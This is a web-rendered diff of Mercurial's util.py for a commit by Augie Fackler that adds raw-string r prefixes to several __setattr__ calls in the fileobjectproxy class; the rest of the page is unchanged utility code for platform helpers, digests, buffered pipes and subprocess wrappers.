##// END OF EJS Templates
util: add missing r prefix on some __setattr__ calls...
Augie Fackler -
r36602:f5427483 default
parent child Browse files
Show More
@@ -1,4298 +1,4298 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import io
29 import io
30 import itertools
30 import itertools
31 import mmap
31 import mmap
32 import os
32 import os
33 import platform as pyplatform
33 import platform as pyplatform
34 import re as remod
34 import re as remod
35 import shutil
35 import shutil
36 import signal
36 import signal
37 import socket
37 import socket
38 import stat
38 import stat
39 import string
39 import string
40 import subprocess
40 import subprocess
41 import sys
41 import sys
42 import tempfile
42 import tempfile
43 import textwrap
43 import textwrap
44 import time
44 import time
45 import traceback
45 import traceback
46 import warnings
46 import warnings
47 import zlib
47 import zlib
48
48
49 from . import (
49 from . import (
50 encoding,
50 encoding,
51 error,
51 error,
52 i18n,
52 i18n,
53 node as nodemod,
53 node as nodemod,
54 policy,
54 policy,
55 pycompat,
55 pycompat,
56 urllibcompat,
56 urllibcompat,
57 )
57 )
58
58
59 base85 = policy.importmod(r'base85')
59 base85 = policy.importmod(r'base85')
60 osutil = policy.importmod(r'osutil')
60 osutil = policy.importmod(r'osutil')
61 parsers = policy.importmod(r'parsers')
61 parsers = policy.importmod(r'parsers')
62
62
63 b85decode = base85.b85decode
63 b85decode = base85.b85decode
64 b85encode = base85.b85encode
64 b85encode = base85.b85encode
65
65
66 cookielib = pycompat.cookielib
66 cookielib = pycompat.cookielib
67 empty = pycompat.empty
67 empty = pycompat.empty
68 httplib = pycompat.httplib
68 httplib = pycompat.httplib
69 pickle = pycompat.pickle
69 pickle = pycompat.pickle
70 queue = pycompat.queue
70 queue = pycompat.queue
71 socketserver = pycompat.socketserver
71 socketserver = pycompat.socketserver
72 stderr = pycompat.stderr
72 stderr = pycompat.stderr
73 stdin = pycompat.stdin
73 stdin = pycompat.stdin
74 stdout = pycompat.stdout
74 stdout = pycompat.stdout
75 stringio = pycompat.stringio
75 stringio = pycompat.stringio
76 xmlrpclib = pycompat.xmlrpclib
76 xmlrpclib = pycompat.xmlrpclib
77
77
78 httpserver = urllibcompat.httpserver
78 httpserver = urllibcompat.httpserver
79 urlerr = urllibcompat.urlerr
79 urlerr = urllibcompat.urlerr
80 urlreq = urllibcompat.urlreq
80 urlreq = urllibcompat.urlreq
81
81
82 # workaround for win32mbcs
82 # workaround for win32mbcs
83 _filenamebytestr = pycompat.bytestr
83 _filenamebytestr = pycompat.bytestr
84
84
85 def isatty(fp):
85 def isatty(fp):
86 try:
86 try:
87 return fp.isatty()
87 return fp.isatty()
88 except AttributeError:
88 except AttributeError:
89 return False
89 return False
90
90
91 # glibc determines buffering on first write to stdout - if we replace a TTY
91 # glibc determines buffering on first write to stdout - if we replace a TTY
92 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 # destined stdout with a pipe destined stdout (e.g. pager), we want line
93 # buffering
93 # buffering
94 if isatty(stdout):
94 if isatty(stdout):
95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
96
96
97 if pycompat.iswindows:
97 if pycompat.iswindows:
98 from . import windows as platform
98 from . import windows as platform
99 stdout = platform.winstdout(stdout)
99 stdout = platform.winstdout(stdout)
100 else:
100 else:
101 from . import posix as platform
101 from . import posix as platform
102
102
103 _ = i18n._
103 _ = i18n._
104
104
105 bindunixsocket = platform.bindunixsocket
105 bindunixsocket = platform.bindunixsocket
106 cachestat = platform.cachestat
106 cachestat = platform.cachestat
107 checkexec = platform.checkexec
107 checkexec = platform.checkexec
108 checklink = platform.checklink
108 checklink = platform.checklink
109 copymode = platform.copymode
109 copymode = platform.copymode
110 executablepath = platform.executablepath
110 executablepath = platform.executablepath
111 expandglobs = platform.expandglobs
111 expandglobs = platform.expandglobs
112 explainexit = platform.explainexit
112 explainexit = platform.explainexit
113 findexe = platform.findexe
113 findexe = platform.findexe
114 getfsmountpoint = platform.getfsmountpoint
114 getfsmountpoint = platform.getfsmountpoint
115 getfstype = platform.getfstype
115 getfstype = platform.getfstype
116 gethgcmd = platform.gethgcmd
116 gethgcmd = platform.gethgcmd
117 getuser = platform.getuser
117 getuser = platform.getuser
118 getpid = os.getpid
118 getpid = os.getpid
119 groupmembers = platform.groupmembers
119 groupmembers = platform.groupmembers
120 groupname = platform.groupname
120 groupname = platform.groupname
121 hidewindow = platform.hidewindow
121 hidewindow = platform.hidewindow
122 isexec = platform.isexec
122 isexec = platform.isexec
123 isowner = platform.isowner
123 isowner = platform.isowner
124 listdir = osutil.listdir
124 listdir = osutil.listdir
125 localpath = platform.localpath
125 localpath = platform.localpath
126 lookupreg = platform.lookupreg
126 lookupreg = platform.lookupreg
127 makedir = platform.makedir
127 makedir = platform.makedir
128 nlinks = platform.nlinks
128 nlinks = platform.nlinks
129 normpath = platform.normpath
129 normpath = platform.normpath
130 normcase = platform.normcase
130 normcase = platform.normcase
131 normcasespec = platform.normcasespec
131 normcasespec = platform.normcasespec
132 normcasefallback = platform.normcasefallback
132 normcasefallback = platform.normcasefallback
133 openhardlinks = platform.openhardlinks
133 openhardlinks = platform.openhardlinks
134 oslink = platform.oslink
134 oslink = platform.oslink
135 parsepatchoutput = platform.parsepatchoutput
135 parsepatchoutput = platform.parsepatchoutput
136 pconvert = platform.pconvert
136 pconvert = platform.pconvert
137 poll = platform.poll
137 poll = platform.poll
138 popen = platform.popen
138 popen = platform.popen
139 posixfile = platform.posixfile
139 posixfile = platform.posixfile
140 quotecommand = platform.quotecommand
140 quotecommand = platform.quotecommand
141 readpipe = platform.readpipe
141 readpipe = platform.readpipe
142 rename = platform.rename
142 rename = platform.rename
143 removedirs = platform.removedirs
143 removedirs = platform.removedirs
144 samedevice = platform.samedevice
144 samedevice = platform.samedevice
145 samefile = platform.samefile
145 samefile = platform.samefile
146 samestat = platform.samestat
146 samestat = platform.samestat
147 setbinary = platform.setbinary
147 setbinary = platform.setbinary
148 setflags = platform.setflags
148 setflags = platform.setflags
149 setsignalhandler = platform.setsignalhandler
149 setsignalhandler = platform.setsignalhandler
150 shellquote = platform.shellquote
150 shellquote = platform.shellquote
151 shellsplit = platform.shellsplit
151 shellsplit = platform.shellsplit
152 spawndetached = platform.spawndetached
152 spawndetached = platform.spawndetached
153 split = platform.split
153 split = platform.split
154 sshargs = platform.sshargs
154 sshargs = platform.sshargs
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
156 statisexec = platform.statisexec
156 statisexec = platform.statisexec
157 statislink = platform.statislink
157 statislink = platform.statislink
158 testpid = platform.testpid
158 testpid = platform.testpid
159 umask = platform.umask
159 umask = platform.umask
160 unlink = platform.unlink
160 unlink = platform.unlink
161 username = platform.username
161 username = platform.username
162
162
163 try:
163 try:
164 recvfds = osutil.recvfds
164 recvfds = osutil.recvfds
165 except AttributeError:
165 except AttributeError:
166 pass
166 pass
167 try:
167 try:
168 setprocname = osutil.setprocname
168 setprocname = osutil.setprocname
169 except AttributeError:
169 except AttributeError:
170 pass
170 pass
171 try:
171 try:
172 unblocksignal = osutil.unblocksignal
172 unblocksignal = osutil.unblocksignal
173 except AttributeError:
173 except AttributeError:
174 pass
174 pass
175
175
176 # Python compatibility
176 # Python compatibility
177
177
178 _notset = object()
178 _notset = object()
179
179
180 # disable Python's problematic floating point timestamps (issue4836)
180 # disable Python's problematic floating point timestamps (issue4836)
181 # (Python hypocritically says you shouldn't change this behavior in
181 # (Python hypocritically says you shouldn't change this behavior in
182 # libraries, and sure enough Mercurial is not a library.)
182 # libraries, and sure enough Mercurial is not a library.)
183 os.stat_float_times(False)
183 os.stat_float_times(False)
184
184
185 def safehasattr(thing, attr):
185 def safehasattr(thing, attr):
186 return getattr(thing, attr, _notset) is not _notset
186 return getattr(thing, attr, _notset) is not _notset
187
187
188 def _rapply(f, xs):
188 def _rapply(f, xs):
189 if xs is None:
189 if xs is None:
190 # assume None means non-value of optional data
190 # assume None means non-value of optional data
191 return xs
191 return xs
192 if isinstance(xs, (list, set, tuple)):
192 if isinstance(xs, (list, set, tuple)):
193 return type(xs)(_rapply(f, x) for x in xs)
193 return type(xs)(_rapply(f, x) for x in xs)
194 if isinstance(xs, dict):
194 if isinstance(xs, dict):
195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
196 return f(xs)
196 return f(xs)
197
197
198 def rapply(f, xs):
198 def rapply(f, xs):
199 """Apply function recursively to every item preserving the data structure
199 """Apply function recursively to every item preserving the data structure
200
200
201 >>> def f(x):
201 >>> def f(x):
202 ... return 'f(%s)' % x
202 ... return 'f(%s)' % x
203 >>> rapply(f, None) is None
203 >>> rapply(f, None) is None
204 True
204 True
205 >>> rapply(f, 'a')
205 >>> rapply(f, 'a')
206 'f(a)'
206 'f(a)'
207 >>> rapply(f, {'a'}) == {'f(a)'}
207 >>> rapply(f, {'a'}) == {'f(a)'}
208 True
208 True
209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
211
211
212 >>> xs = [object()]
212 >>> xs = [object()]
213 >>> rapply(pycompat.identity, xs) is xs
213 >>> rapply(pycompat.identity, xs) is xs
214 True
214 True
215 """
215 """
216 if f is pycompat.identity:
216 if f is pycompat.identity:
217 # fast path mainly for py2
217 # fast path mainly for py2
218 return xs
218 return xs
219 return _rapply(f, xs)
219 return _rapply(f, xs)
220
220
221 def bytesinput(fin, fout, *args, **kwargs):
221 def bytesinput(fin, fout, *args, **kwargs):
222 sin, sout = sys.stdin, sys.stdout
222 sin, sout = sys.stdin, sys.stdout
223 try:
223 try:
224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
226 finally:
226 finally:
227 sys.stdin, sys.stdout = sin, sout
227 sys.stdin, sys.stdout = sin, sout
228
228
229 def bitsfrom(container):
229 def bitsfrom(container):
230 bits = 0
230 bits = 0
231 for bit in container:
231 for bit in container:
232 bits |= bit
232 bits |= bit
233 return bits
233 return bits
234
234
235 # python 2.6 still have deprecation warning enabled by default. We do not want
235 # python 2.6 still have deprecation warning enabled by default. We do not want
236 # to display anything to standard user so detect if we are running test and
236 # to display anything to standard user so detect if we are running test and
237 # only use python deprecation warning in this case.
237 # only use python deprecation warning in this case.
238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
239 if _dowarn:
239 if _dowarn:
240 # explicitly unfilter our warning for python 2.7
240 # explicitly unfilter our warning for python 2.7
241 #
241 #
242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
243 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 # However, module name set through PYTHONWARNINGS was exactly matched, so
244 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
245 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 # makes the whole PYTHONWARNINGS thing useless for our usecase.
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
249
249
250 def nouideprecwarn(msg, version, stacklevel=1):
250 def nouideprecwarn(msg, version, stacklevel=1):
251 """Issue an python native deprecation warning
251 """Issue an python native deprecation warning
252
252
253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
254 """
254 """
255 if _dowarn:
255 if _dowarn:
256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
257 " update your code.)") % version
257 " update your code.)") % version
258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
259
259
260 DIGESTS = {
260 DIGESTS = {
261 'md5': hashlib.md5,
261 'md5': hashlib.md5,
262 'sha1': hashlib.sha1,
262 'sha1': hashlib.sha1,
263 'sha512': hashlib.sha512,
263 'sha512': hashlib.sha512,
264 }
264 }
265 # List of digest types from strongest to weakest
265 # List of digest types from strongest to weakest
266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
267
267
268 for k in DIGESTS_BY_STRENGTH:
268 for k in DIGESTS_BY_STRENGTH:
269 assert k in DIGESTS
269 assert k in DIGESTS
270
270
271 class digester(object):
271 class digester(object):
272 """helper to compute digests.
272 """helper to compute digests.
273
273
274 This helper can be used to compute one or more digests given their name.
274 This helper can be used to compute one or more digests given their name.
275
275
276 >>> d = digester([b'md5', b'sha1'])
276 >>> d = digester([b'md5', b'sha1'])
277 >>> d.update(b'foo')
277 >>> d.update(b'foo')
278 >>> [k for k in sorted(d)]
278 >>> [k for k in sorted(d)]
279 ['md5', 'sha1']
279 ['md5', 'sha1']
280 >>> d[b'md5']
280 >>> d[b'md5']
281 'acbd18db4cc2f85cedef654fccc4a4d8'
281 'acbd18db4cc2f85cedef654fccc4a4d8'
282 >>> d[b'sha1']
282 >>> d[b'sha1']
283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
284 >>> digester.preferred([b'md5', b'sha1'])
284 >>> digester.preferred([b'md5', b'sha1'])
285 'sha1'
285 'sha1'
286 """
286 """
287
287
288 def __init__(self, digests, s=''):
288 def __init__(self, digests, s=''):
289 self._hashes = {}
289 self._hashes = {}
290 for k in digests:
290 for k in digests:
291 if k not in DIGESTS:
291 if k not in DIGESTS:
292 raise Abort(_('unknown digest type: %s') % k)
292 raise Abort(_('unknown digest type: %s') % k)
293 self._hashes[k] = DIGESTS[k]()
293 self._hashes[k] = DIGESTS[k]()
294 if s:
294 if s:
295 self.update(s)
295 self.update(s)
296
296
297 def update(self, data):
297 def update(self, data):
298 for h in self._hashes.values():
298 for h in self._hashes.values():
299 h.update(data)
299 h.update(data)
300
300
301 def __getitem__(self, key):
301 def __getitem__(self, key):
302 if key not in DIGESTS:
302 if key not in DIGESTS:
303 raise Abort(_('unknown digest type: %s') % k)
303 raise Abort(_('unknown digest type: %s') % k)
304 return nodemod.hex(self._hashes[key].digest())
304 return nodemod.hex(self._hashes[key].digest())
305
305
306 def __iter__(self):
306 def __iter__(self):
307 return iter(self._hashes)
307 return iter(self._hashes)
308
308
309 @staticmethod
309 @staticmethod
310 def preferred(supported):
310 def preferred(supported):
311 """returns the strongest digest type in both supported and DIGESTS."""
311 """returns the strongest digest type in both supported and DIGESTS."""
312
312
313 for k in DIGESTS_BY_STRENGTH:
313 for k in DIGESTS_BY_STRENGTH:
314 if k in supported:
314 if k in supported:
315 return k
315 return k
316 return None
316 return None
317
317
318 class digestchecker(object):
318 class digestchecker(object):
319 """file handle wrapper that additionally checks content against a given
319 """file handle wrapper that additionally checks content against a given
320 size and digests.
320 size and digests.
321
321
322 d = digestchecker(fh, size, {'md5': '...'})
322 d = digestchecker(fh, size, {'md5': '...'})
323
323
324 When multiple digests are given, all of them are validated.
324 When multiple digests are given, all of them are validated.
325 """
325 """
326
326
327 def __init__(self, fh, size, digests):
327 def __init__(self, fh, size, digests):
328 self._fh = fh
328 self._fh = fh
329 self._size = size
329 self._size = size
330 self._got = 0
330 self._got = 0
331 self._digests = dict(digests)
331 self._digests = dict(digests)
332 self._digester = digester(self._digests.keys())
332 self._digester = digester(self._digests.keys())
333
333
334 def read(self, length=-1):
334 def read(self, length=-1):
335 content = self._fh.read(length)
335 content = self._fh.read(length)
336 self._digester.update(content)
336 self._digester.update(content)
337 self._got += len(content)
337 self._got += len(content)
338 return content
338 return content
339
339
340 def validate(self):
340 def validate(self):
341 if self._size != self._got:
341 if self._size != self._got:
342 raise Abort(_('size mismatch: expected %d, got %d') %
342 raise Abort(_('size mismatch: expected %d, got %d') %
343 (self._size, self._got))
343 (self._size, self._got))
344 for k, v in self._digests.items():
344 for k, v in self._digests.items():
345 if v != self._digester[k]:
345 if v != self._digester[k]:
346 # i18n: first parameter is a digest name
346 # i18n: first parameter is a digest name
347 raise Abort(_('%s mismatch: expected %s, got %s') %
347 raise Abort(_('%s mismatch: expected %s, got %s') %
348 (k, v, self._digester[k]))
348 (k, v, self._digester[k]))
349
349
350 try:
350 try:
351 buffer = buffer
351 buffer = buffer
352 except NameError:
352 except NameError:
353 def buffer(sliceable, offset=0, length=None):
353 def buffer(sliceable, offset=0, length=None):
354 if length is not None:
354 if length is not None:
355 return memoryview(sliceable)[offset:offset + length]
355 return memoryview(sliceable)[offset:offset + length]
356 return memoryview(sliceable)[offset:]
356 return memoryview(sliceable)[offset:]
357
357
358 closefds = pycompat.isposix
358 closefds = pycompat.isposix
359
359
360 _chunksize = 4096
360 _chunksize = 4096
361
361
362 class bufferedinputpipe(object):
362 class bufferedinputpipe(object):
363 """a manually buffered input pipe
363 """a manually buffered input pipe
364
364
365 Python will not let us use buffered IO and lazy reading with 'polling' at
365 Python will not let us use buffered IO and lazy reading with 'polling' at
366 the same time. We cannot probe the buffer state and select will not detect
366 the same time. We cannot probe the buffer state and select will not detect
367 that data are ready to read if they are already buffered.
367 that data are ready to read if they are already buffered.
368
368
369 This class let us work around that by implementing its own buffering
369 This class let us work around that by implementing its own buffering
370 (allowing efficient readline) while offering a way to know if the buffer is
370 (allowing efficient readline) while offering a way to know if the buffer is
371 empty from the output (allowing collaboration of the buffer with polling).
371 empty from the output (allowing collaboration of the buffer with polling).
372
372
373 This class lives in the 'util' module because it makes use of the 'os'
373 This class lives in the 'util' module because it makes use of the 'os'
374 module from the python stdlib.
374 module from the python stdlib.
375 """
375 """
376 def __new__(cls, fh):
376 def __new__(cls, fh):
377 # If we receive a fileobjectproxy, we need to use a variation of this
377 # If we receive a fileobjectproxy, we need to use a variation of this
378 # class that notifies observers about activity.
378 # class that notifies observers about activity.
379 if isinstance(fh, fileobjectproxy):
379 if isinstance(fh, fileobjectproxy):
380 cls = observedbufferedinputpipe
380 cls = observedbufferedinputpipe
381
381
382 return super(bufferedinputpipe, cls).__new__(cls)
382 return super(bufferedinputpipe, cls).__new__(cls)
383
383
384 def __init__(self, input):
384 def __init__(self, input):
385 self._input = input
385 self._input = input
386 self._buffer = []
386 self._buffer = []
387 self._eof = False
387 self._eof = False
388 self._lenbuf = 0
388 self._lenbuf = 0
389
389
390 @property
390 @property
391 def hasbuffer(self):
391 def hasbuffer(self):
392 """True is any data is currently buffered
392 """True is any data is currently buffered
393
393
394 This will be used externally a pre-step for polling IO. If there is
394 This will be used externally a pre-step for polling IO. If there is
395 already data then no polling should be set in place."""
395 already data then no polling should be set in place."""
396 return bool(self._buffer)
396 return bool(self._buffer)
397
397
398 @property
398 @property
399 def closed(self):
399 def closed(self):
400 return self._input.closed
400 return self._input.closed
401
401
402 def fileno(self):
402 def fileno(self):
403 return self._input.fileno()
403 return self._input.fileno()
404
404
405 def close(self):
405 def close(self):
406 return self._input.close()
406 return self._input.close()
407
407
408 def read(self, size):
408 def read(self, size):
409 while (not self._eof) and (self._lenbuf < size):
409 while (not self._eof) and (self._lenbuf < size):
410 self._fillbuffer()
410 self._fillbuffer()
411 return self._frombuffer(size)
411 return self._frombuffer(size)
412
412
413 def readline(self, *args, **kwargs):
413 def readline(self, *args, **kwargs):
414 if 1 < len(self._buffer):
414 if 1 < len(self._buffer):
415 # this should not happen because both read and readline end with a
415 # this should not happen because both read and readline end with a
416 # _frombuffer call that collapse it.
416 # _frombuffer call that collapse it.
417 self._buffer = [''.join(self._buffer)]
417 self._buffer = [''.join(self._buffer)]
418 self._lenbuf = len(self._buffer[0])
418 self._lenbuf = len(self._buffer[0])
419 lfi = -1
419 lfi = -1
420 if self._buffer:
420 if self._buffer:
421 lfi = self._buffer[-1].find('\n')
421 lfi = self._buffer[-1].find('\n')
422 while (not self._eof) and lfi < 0:
422 while (not self._eof) and lfi < 0:
423 self._fillbuffer()
423 self._fillbuffer()
424 if self._buffer:
424 if self._buffer:
425 lfi = self._buffer[-1].find('\n')
425 lfi = self._buffer[-1].find('\n')
426 size = lfi + 1
426 size = lfi + 1
427 if lfi < 0: # end of file
427 if lfi < 0: # end of file
428 size = self._lenbuf
428 size = self._lenbuf
429 elif 1 < len(self._buffer):
429 elif 1 < len(self._buffer):
430 # we need to take previous chunks into account
430 # we need to take previous chunks into account
431 size += self._lenbuf - len(self._buffer[-1])
431 size += self._lenbuf - len(self._buffer[-1])
432 return self._frombuffer(size)
432 return self._frombuffer(size)
433
433
434 def _frombuffer(self, size):
434 def _frombuffer(self, size):
435 """return at most 'size' data from the buffer
435 """return at most 'size' data from the buffer
436
436
437 The data are removed from the buffer."""
437 The data are removed from the buffer."""
438 if size == 0 or not self._buffer:
438 if size == 0 or not self._buffer:
439 return ''
439 return ''
440 buf = self._buffer[0]
440 buf = self._buffer[0]
441 if 1 < len(self._buffer):
441 if 1 < len(self._buffer):
442 buf = ''.join(self._buffer)
442 buf = ''.join(self._buffer)
443
443
444 data = buf[:size]
444 data = buf[:size]
445 buf = buf[len(data):]
445 buf = buf[len(data):]
446 if buf:
446 if buf:
447 self._buffer = [buf]
447 self._buffer = [buf]
448 self._lenbuf = len(buf)
448 self._lenbuf = len(buf)
449 else:
449 else:
450 self._buffer = []
450 self._buffer = []
451 self._lenbuf = 0
451 self._lenbuf = 0
452 return data
452 return data
453
453
454 def _fillbuffer(self):
454 def _fillbuffer(self):
455 """read data to the buffer"""
455 """read data to the buffer"""
456 data = os.read(self._input.fileno(), _chunksize)
456 data = os.read(self._input.fileno(), _chunksize)
457 if not data:
457 if not data:
458 self._eof = True
458 self._eof = True
459 else:
459 else:
460 self._lenbuf += len(data)
460 self._lenbuf += len(data)
461 self._buffer.append(data)
461 self._buffer.append(data)
462
462
463 return data
463 return data
464
464
465 def mmapread(fp):
465 def mmapread(fp):
466 try:
466 try:
467 fd = getattr(fp, 'fileno', lambda: fp)()
467 fd = getattr(fp, 'fileno', lambda: fp)()
468 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
468 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
469 except ValueError:
469 except ValueError:
470 # Empty files cannot be mmapped, but mmapread should still work. Check
470 # Empty files cannot be mmapped, but mmapread should still work. Check
471 # if the file is empty, and if so, return an empty buffer.
471 # if the file is empty, and if so, return an empty buffer.
472 if os.fstat(fd).st_size == 0:
472 if os.fstat(fd).st_size == 0:
473 return ''
473 return ''
474 raise
474 raise
475
475
476 def popen2(cmd, env=None, newlines=False):
476 def popen2(cmd, env=None, newlines=False):
477 # Setting bufsize to -1 lets the system decide the buffer size.
477 # Setting bufsize to -1 lets the system decide the buffer size.
478 # The default for bufsize is 0, meaning unbuffered. This leads to
478 # The default for bufsize is 0, meaning unbuffered. This leads to
479 # poor performance on Mac OS X: http://bugs.python.org/issue4194
479 # poor performance on Mac OS X: http://bugs.python.org/issue4194
480 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
480 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
481 close_fds=closefds,
481 close_fds=closefds,
482 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
482 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
483 universal_newlines=newlines,
483 universal_newlines=newlines,
484 env=env)
484 env=env)
485 return p.stdin, p.stdout
485 return p.stdin, p.stdout
486
486
487 def popen3(cmd, env=None, newlines=False):
487 def popen3(cmd, env=None, newlines=False):
488 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
488 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
489 return stdin, stdout, stderr
489 return stdin, stdout, stderr
490
490
491 def popen4(cmd, env=None, newlines=False, bufsize=-1):
491 def popen4(cmd, env=None, newlines=False, bufsize=-1):
492 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
492 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
493 close_fds=closefds,
493 close_fds=closefds,
494 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
494 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
495 stderr=subprocess.PIPE,
495 stderr=subprocess.PIPE,
496 universal_newlines=newlines,
496 universal_newlines=newlines,
497 env=env)
497 env=env)
498 return p.stdin, p.stdout, p.stderr, p
498 return p.stdin, p.stdout, p.stderr, p
499
499
500 class fileobjectproxy(object):
500 class fileobjectproxy(object):
501 """A proxy around file objects that tells a watcher when events occur.
501 """A proxy around file objects that tells a watcher when events occur.
502
502
503 This type is intended to only be used for testing purposes. Think hard
503 This type is intended to only be used for testing purposes. Think hard
504 before using it in important code.
504 before using it in important code.
505 """
505 """
506 __slots__ = (
506 __slots__ = (
507 r'_orig',
507 r'_orig',
508 r'_observer',
508 r'_observer',
509 )
509 )
510
510
511 def __init__(self, fh, observer):
511 def __init__(self, fh, observer):
512 object.__setattr__(self, '_orig', fh)
512 object.__setattr__(self, r'_orig', fh)
513 object.__setattr__(self, '_observer', observer)
513 object.__setattr__(self, r'_observer', observer)
514
514
    def __getattribute__(self, name):
        # Names we implement on the proxy itself so the call can be
        # observed; everything else is fetched from the wrapped object.
        ours = {
            r'_observer',

            # IOBase
            r'close',
            # closed if a property
            r'fileno',
            r'flush',
            r'isatty',
            r'readable',
            r'readline',
            r'readlines',
            r'seek',
            r'seekable',
            r'tell',
            r'truncate',
            r'writable',
            r'writelines',
            # RawIOBase
            r'read',
            r'readall',
            r'readinto',
            r'write',
            # BufferedIOBase
            # raw is a property
            r'detach',
            # read defined above
            r'read1',
            # readinto defined above
            # write defined above
        }

        # We only observe some methods.
        if name in ours:
            return object.__getattribute__(self, name)

        # Everything else (properties like ``closed``, unknown attributes)
        # is resolved against the wrapped file object, unobserved.
        return getattr(object.__getattribute__(self, r'_orig'), name)
553
553
    def __delattr__(self, name):
        # Attribute deletion always acts on the wrapped file object.
        return delattr(object.__getattribute__(self, r'_orig'), name)
556
556
    def __setattr__(self, name, value):
        # Attribute assignment always acts on the wrapped file object.
        return setattr(object.__getattribute__(self, r'_orig'), name, value)
559
559
    def __iter__(self):
        # Iteration is forwarded (unobserved) to the wrapped file object.
        return object.__getattribute__(self, r'_orig').__iter__()
562
562
    def _observedcall(self, name, *args, **kwargs):
        """Invoke ``name`` on the wrapped object, then notify the observer.

        If the observer defines a method of the same name, it is called
        with the result followed by the original arguments. Returns the
        wrapped call's result.
        """
        # Call the original object.
        orig = object.__getattribute__(self, r'_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, r'_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res
576
576
    # Each method below forwards its call to the wrapped file object via
    # _observedcall(), which also notifies the observer of the call.  The
    # set of names mirrors ``ours`` in __getattribute__.
    def close(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'close', *args, **kwargs)

    def fileno(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'fileno', *args, **kwargs)

    def flush(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'flush', *args, **kwargs)

    def isatty(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'isatty', *args, **kwargs)

    def readable(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readable', *args, **kwargs)

    def readline(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readline', *args, **kwargs)

    def readlines(self, *args, **kwargs):
        return object.__getattribute__(self, r'_observedcall')(
            r'readlines', *args, **kwargs)

